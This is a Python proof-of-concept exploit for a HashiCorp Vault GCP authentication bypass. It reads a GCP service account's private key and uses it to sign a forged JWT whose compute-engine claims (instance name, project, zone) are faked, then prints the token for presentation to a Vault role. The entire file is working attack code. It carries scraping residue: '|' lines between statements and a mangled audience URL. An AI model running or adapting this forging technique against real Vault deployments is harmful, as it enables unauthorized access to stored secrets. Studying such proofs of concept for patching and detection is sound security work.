#!/usr/bin/env python3
|
# -*- coding: utf-8 -*-
|
|
# Proof of Concept Exploit for HashiCorp Vault GCP auth bypass
|
# 14/07/2020 - [email protected]
|
|
import argparse
|
import jwt
|
import time
|
import base64
|
import json
|
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument("-s", "--service_account",
|
help="Service Account json file", required=True)
|
parser.add_argument("-i", "--instance_name", help="Faked Instance Name")
|
parser.add_argument("-p", "--project_id",
|
help="Faked Project ID", required=True)
|
parser.add_argument("-z", "--zone", help="Faked VM Zone", required=True)
|
parser.add_argument("-r", "--role", help="Vault role", required=True)
|
args = parser.parse_args()
|
|
|
def main():
|
|
sa = json.load(open(args.service_account))
|
|
sub = sa["client_email"]
|
priv = sa["private_key"]
|
kid = sa["private_key_id"]
|
|
token = {
|
"aud": "http://vault/"+args.role,
|
"iat": int(time.time()),
|
"exp": int(time.time())+60*30,
|
"sub": sub,
|
"google": {
|
"compute_engine": {
|
"instance_id": "1",
|
"instance_name": args.instance_name,
|
"project_id": args.project_id,
|
"zone": args.zone,
|
"project_number": 1337,
|
"instance_creation_timestamp": 9999999999
|
}
|
}
|
|
}
|
|
print("[x] token: ", token, "\n")
|
|
encoded = jwt.encode(token, priv, algorithm='RS256', headers={"kid": kid})
|
print("[x] jwt:", encoded)
|
|
|
if __name__ == '__main__':
|
main()
|